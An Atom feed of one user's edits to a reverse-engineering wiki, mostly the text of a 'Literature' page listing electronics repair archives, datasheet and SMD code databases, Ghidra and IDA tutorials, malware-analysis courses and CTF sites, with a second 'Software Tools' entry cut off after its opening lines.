<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.recessim.com/w/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Polymorphic7</id>
	<title>RECESSIM - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.recessim.com/w/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Polymorphic7"/>
	<link rel="alternate" type="text/html" href="https://wiki.recessim.com/view/Special:Contributions/Polymorphic7"/>
	<updated>2026-04-14T18:02:56Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.34.1</generator>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3314</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3314"/>
		<updated>2026-04-05T01:13:39Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add clevo mirror&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://repo.palkeo.com/clevo-mirror/ palkeo Clevo Mirror] - Third party Clevo notebook bioses and manual mirror.&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====GPU Repair====&lt;br /&gt;
::[https://levirepair.eu/infusions/forum/viewthread.php?thread_id=10&amp;amp;pid=72#post_72 LeviRepair] is a specialized online forum and community focused on technical GPU repair, diagnostics, and component-level troubleshooting. It acts as a knowledge base for repairing graphics cards, covering topics like VRAM testing, bios flashing, and hardware repairs for NVIDIA and AMD cards.&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
====Paid sources (various fields)====&lt;br /&gt;
Most of the websites provide free service manuals and boardviews, '''but some unfortunately don't or have been PAYWALLED (badcaps.net as of 2026). '''&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search &amp;lt;--- Pay 2 download..&lt;br /&gt;
&lt;br /&gt;
::[https://vinafix.com/ Vinafix] - Vinafix Electronics Repair Forum &amp;amp; Schematic Search &amp;lt;--- Pay 2 download..&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3313</id>
		<title>Software Tools</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3313"/>
		<updated>2026-04-05T00:54:56Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: fix url&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Software_wiki_banner.png|frameless|1280x300px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!&lt;br /&gt;
==Tool Index==&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
